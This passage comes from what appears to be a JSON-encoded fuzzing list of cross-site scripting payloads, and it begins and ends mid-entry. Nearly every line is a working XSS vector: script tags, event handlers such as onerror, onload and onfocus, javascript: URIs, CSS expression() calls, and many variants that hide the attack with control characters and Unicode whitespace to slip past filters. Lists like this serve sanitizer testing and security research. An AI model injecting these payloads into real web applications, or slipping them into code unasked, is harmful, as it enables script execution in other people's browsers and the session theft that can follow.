src=\"javascript:javascript:alert(1)\"\u003e\u003c/iframe src\u003e\n\u003csvg onload svg onload=\"javascript:javascript:alert(1)\"\u003e\u003c/svg onload\u003e\n\u003chtml onmousemove html onmousemove=\"javascript:javascript:alert(1)\"\u003e\u003c/html onmousemove\u003e\n\u003cbody onblur body onblur=\"javascript:javascript:alert(1)\"\u003e\u003c/body onblur\u003e\n\\x3Cscript\u003ejavascript:alert(1)\u003c/script\u003e\n'\"`\u003e\u003cscript\u003e/* *\\x2Fjavascript:alert(1)// */\u003c/script\u003e\n\u003cscript\u003ejavascript:alert(1)\u003c/script\\x0D\n\u003cscript\u003ejavascript:alert(1)\u003c/script\\x0A\n\u003cscript\u003ejavascript:alert(1)\u003c/script\\x0B\n\u003cscript charset=\"\\x22\u003ejavascript:alert(1)\u003c/script\u003e\n\u003c!--\\x3E\u003cimg src=xxx:x onerror=javascript:alert(1)\u003e --\u003e\n--\u003e\u003c!-- ---\u003e \u003cimg src=xxx:x onerror=javascript:alert(1)\u003e --\u003e\n--\u003e\u003c!-- --\\x00\u003e \u003cimg src=xxx:x onerror=javascript:alert(1)\u003e --\u003e\n--\u003e\u003c!-- --\\x21\u003e \u003cimg src=xxx:x onerror=javascript:alert(1)\u003e --\u003e\n--\u003e\u003c!-- --\\x3E\u003e \u003cimg src=xxx:x onerror=javascript:alert(1)\u003e --\u003e\n`\"'\u003e\u003cimg src='#\\x27 onerror=javascript:alert(1)\u003e\n\u003ca href=\"javascript\\x3Ajavascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\"'`\u003e\u003cp\u003e\u003csvg\u003e\u003cscript\u003ea='hello\\x27;javascript:alert(1)//';\u003c/script\u003e\u003c/p\u003e\n\u003ca href=\"javas\\x00cript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x07cript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x0Dcript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x0Acript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x08cript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x02cript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x03cript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x04cript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x01cript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x05cript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x0Bcript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x09cript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x06cript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javas\\x0Ccript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003cscript\u003e/* *\\x2A/javascript:alert(1)// */\u003c/script\u003e\n\u003cscript\u003e/* *\\x00/javascript:alert(1)// */\u003c/script\u003e\n\u003cstyle\u003e\u003c/style\\x3E\u003cimg src=\"about:blank\" onerror=javascript:alert(1)//\u003e\u003c/style\u003e\n\u003cstyle\u003e\u003c/style\\x0D\u003cimg src=\"about:blank\" onerror=javascript:alert(1)//\u003e\u003c/style\u003e\n\u003cstyle\u003e\u003c/style\\x09\u003cimg src=\"about:blank\" onerror=javascript:alert(1)//\u003e\u003c/style\u003e\n\u003cstyle\u003e\u003c/style\\x20\u003cimg src=\"about:blank\" onerror=javascript:alert(1)//\u003e\u003c/style\u003e\n\u003cstyle\u003e\u003c/style\\x0A\u003cimg src=\"about:blank\" onerror=javascript:alert(1)//\u003e\u003c/style\u003e\n\"'`\u003eABC\u003cdiv style=\"font-family:'foo'\\x7Dx:expression(javascript:alert(1);/*';\"\u003eDEF\n\"'`\u003eABC\u003cdiv style=\"font-family:'foo'\\x3Bx:expression(javascript:alert(1);/*';\"\u003eDEF\n\u003cscript\u003eif(\"x\\\\xE1\\x96\\x89\".length==2) { javascript:alert(1);}\u003c/script\u003e\n\u003cscript\u003eif(\"x\\\\xE0\\xB9\\x92\".length==2) { javascript:alert(1);}\u003c/script\u003e\n\u003cscript\u003eif(\"x\\\\xEE\\xA9\\x93\".length==2) { javascript:alert(1);}\u003c/script\u003e\n'`\"\u003e\u003c\\x3Cscript\u003ejavascript:alert(1)\u003c/script\u003e\n'`\"\u003e\u003c\\x00script\u003ejavascript:alert(1)\u003c/script\u003e\n\"'`\u003e\u003c\\x3Cimg src=xxx:x onerror=javascript:alert(1)\u003e\n\"'`\u003e\u003c\\x00img src=xxx:x onerror=javascript:alert(1)\u003e\n\u003cscript src=\"data:text/plain\\x2Cjavascript:alert(1)\"\u003e\u003c/script\u003e\n\u003cscript src=\"data:\\xD4\\x8F,javascript:alert(1)\"\u003e\u003c/script\u003e\n\u003cscript src=\"data:\\xE0\\xA4\\x98,javascript:alert(1)\"\u003e\u003c/script\u003e\n\u003cscript src=\"data:\\xCB\\x8F,javascript:alert(1)\"\u003e\u003c/script\u003e\n\u003cscript\\x20type=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n\u003cscript\\x3Etype=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n\u003cscript\\x0Dtype=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n\u003cscript\\x09type=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n\u003cscript\\x0Ctype=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n\u003cscript\\x2Ftype=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n\u003cscript\\x0Atype=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\nABC\u003cdiv style=\"x\\x3Aexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:expression\\x5C(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:expression\\x00(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:exp\\x00ression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:exp\\x5Cression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x0Aexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x09expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xC2\\xA0expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x0Dexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x0Cexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x20expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x00expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x0Bexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\"\u003eDEF\n\u003ca href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x0Aonerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x22onerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x0Bonerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x0Donerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x2Fonerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x09onerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x0Conerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x00onerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x27onerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x20onerror=javascript:alert(1)\u003e\n\"`'\u003e\u003cscript\u003e\\x3Bjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x0Djavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xEF\\xBB\\xBFjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x81javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x84javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE3\\x80\\x80javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x09javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x89javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x85javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x88javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x00javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\xA8javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x8Ajavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE1\\x9A\\x80javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x0Cjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x2Bjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xF0\\x90\\x96\\x9Ajavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e-javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x0Ajavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\xAFjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x7Ejavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x87javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x81\\x9Fjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\xA9javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xC2\\x85javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xEF\\xBF\\xAEjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x83javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x8Bjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xEF\\xBF\\xBEjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x80javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x21javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x82javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x86javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE1\\xA0\\x8Ejavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x0Bjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x20javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xC2\\xA0javascript:alert(1)\u003c/script\u003e\n\"/\u003e\u003cimg/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x /\u003e\n\"/\u003e\u003cimg/onerror=\\x22javascript:alert(1)\\x22src=xxx:x /\u003e\n\"/\u003e\u003cimg/onerror=\\x09javascript:alert(1)\\x09src=xxx:x /\u003e\n\"/\u003e\u003cimg/onerror=\\x27javascript:alert(1)\\x27src=xxx:x /\u003e\n\"/\u003e\u003cimg/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x /\u003e\n\"/\u003e\u003cimg/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x /\u003e\n\"/\u003e\u003cimg/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x /\u003e\n\"/\u003e\u003cimg/onerror=\\x60javascript:alert(1)\\x60src=xxx:x /\u003e\n\"/\u003e\u003cimg/onerror=\\x20javascript:alert(1)\\x20src=xxx:x /\u003e\n\u003cscript\\x2F\u003ejavascript:alert(1)\u003c/script\u003e\n\u003cscript\\x20\u003ejavascript:alert(1)\u003c/script\u003e\n\u003cscript\\x0D\u003ejavascript:alert(1)\u003c/script\u003e\n\u003cscript\\x0A\u003ejavascript:alert(1)\u003c/script\u003e\n\u003cscript\\x0C\u003ejavascript:alert(1)\u003c/script\u003e\n\u003cscript\\x00\u003ejavascript:alert(1)\u003c/script\u003e\n\u003cscript\\x09\u003ejavascript:alert(1)\u003c/script\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert(1)\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert('1')\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert(\"1\")\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert(`1`)\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert(('1'))\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert((\"1\"))\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert((`1`))\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert(A)\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert((A))\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert(('A'))\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert('A')\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert((\"A\"))\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert(\"A\")\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert((`A`))\u003e\n\"\u003e\u003cimg src=x onerror=javascript:alert(`A`)\u003e\n`\"'\u003e\u003cimg src=xxx:x onerror\\x0B=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x onerror\\x00=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x onerror\\x0C=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x onerror\\x0D=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x onerror\\x20=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x onerror\\x0A=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x onerror\\x09=javascript:alert(1)\u003e\n\u003cscript\u003ejavascript:alert(1)\u003c\\x00/script\u003e\n\u003cimg src=# onerror\\x3D\"javascript:alert(1)\" \u003e\n\u003cinput onfocus=javascript:alert(1) autofocus\u003e\n\u003cinput onblur=javascript:alert(1) autofocus\u003e\u003cinput autofocus\u003e\n\u003cvideo poster=javascript:javascript:alert(1)//\n\u003cbody onscroll=javascript:alert(1)\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e...\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e...\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e...\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e...\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e...\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cinput autofocus\u003e\n\u003cform id=test onforminput=javascript:alert(1)\u003e\u003cinput\u003e\u003c/form\u003e\u003cbutton form=test onformchange=javascript:alert(1)\u003eX\n\u003cvideo\u003e\u003csource onerror=\"javascript:javascript:alert(1)\"\u003e\n\u003cvideo onerror=\"javascript:javascript:alert(1)\"\u003e\u003csource\u003e\n\u003cform\u003e\u003cbutton formaction=\"javascript:javascript:alert(1)\"\u003eX\n\u003cbody oninput=javascript:alert(1)\u003e\u003cinput autofocus\u003e\n\u003cmath href=\"javascript:javascript:alert(1)\"\u003eCLICKME\u003c/math\u003e  \u003cmath\u003e \u003cmaction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:javascript:alert(1)\"\u003eCLICKME\u003c/maction\u003e \u003c/math\u003e\n\u003cframeset onload=javascript:alert(1)\u003e\n\u003ctable background=\"javascript:javascript:alert(1)\"\u003e\n\u003c!--\u003cimg src=\"--\u003e\u003cimg src=x onerror=javascript:alert(1)//\"\u003e\n\u003ccomment\u003e\u003cimg src=\"\u003c/comment\u003e\u003cimg src=x onerror=javascript:alert(1))//\"\u003e\n\u003c![\u003e\u003cimg src=\"]\u003e\u003cimg src=x onerror=javascript:alert(1)//\"\u003e\n\u003cstyle\u003e\u003cimg src=\"\u003c/style\u003e\u003cimg src=x onerror=javascript:alert(1)//\"\u003e\n\u003cli style=list-style:url() onerror=javascript:alert(1)\u003e \u003cdiv style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)\u003e\u003c/div\u003e\n\u003chead\u003e\u003cbase href=\"javascript://\"\u003e\u003c/head\u003e\u003cbody\u003e\u003ca href=\"/. /,javascript:alert(1)//#\"\u003eXXX\u003c/a\u003e\u003c/body\u003e\n\u003cSCRIPT FOR=document EVENT=onreadystatechange\u003ejavascript:alert(1)\u003c/SCRIPT\u003e\n\u003cOBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"\u003e\u003cPARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"\u003e\u003c/OBJECT\u003e\n\u003cobject data=\"data:text/html;base64,%(base64)s\"\u003e\n\u003cembed src=\"data:text/html;base64,%(base64)s\"\u003e\n\u003cb \u003cscript\u003ealert(1)\u003c/script\u003e0\n\u003cdiv id=\"div1\"\u003e\u003cinput value=\"``onmouseover=javascript:alert(1)\"\u003e\u003c/div\u003e \u003cdiv id=\"div2\"\u003e\u003c/div\u003e\u003cscript\u003edocument.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;\u003c/script\u003e\n\u003cx '=\"foo\"\u003e\u003cx foo='\u003e\u003cimg src=x onerror=javascript:alert(1)//'\u003e\n\u003cembed src=\"javascript:alert(1)\"\u003e\n\u003cimg src=\"javascript:alert(1)\"\u003e\n\u003cimage src=\"javascript:alert(1)\"\u003e\n\u003cscript src=\"javascript:alert(1)\"\u003e\n\u003cdiv style=width:1px;filter:glow onfilterchange=javascript:alert(1)\u003ex\n\u003c? foo=\"\u003e\u003cscript\u003ejavascript:alert(1)\u003c/script\u003e\"\u003e\n\u003c! foo=\"\u003e\u003cscript\u003ejavascript:alert(1)\u003c/script\u003e\"\u003e\n\u003c/ foo=\"\u003e\u003cscript\u003ejavascript:alert(1)\u003c/script\u003e\"\u003e\n\u003c? foo=\"\u003e\u003cx foo='?\u003e\u003cscript\u003ejavascript:alert(1)\u003c/script\u003e'\u003e\"\u003e\n\u003c! foo=\"[[[Inception]]\"\u003e\u003cx foo=\"]foo\u003e\u003cscript\u003ejavascript:alert(1)\u003c/script\u003e\"\u003e\n\u003c% foo\u003e\u003cx foo=\"%\u003e\u003cscript\u003ejavascript:alert(1)\u003c/script\u003e\"\u003e\n\u003cdiv id=d\u003e\u003cx xmlns=\"\u003e\u003ciframe onload=javascript:alert(1)\"\u003e\u003c/div\u003e \u003cscript\u003ed.innerHTML=d.innerHTML\u003c/script\u003e\n\u003cimg \\x00src=x onerror=\"alert(1)\"\u003e\n\u003cimg \\x11src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg \\x12src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg\\x10src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg\\x13src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg\\x32src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg\\x47src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg\\x11src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg \\x47src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg \\x34src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg \\x39src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg \\x00src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x09=x 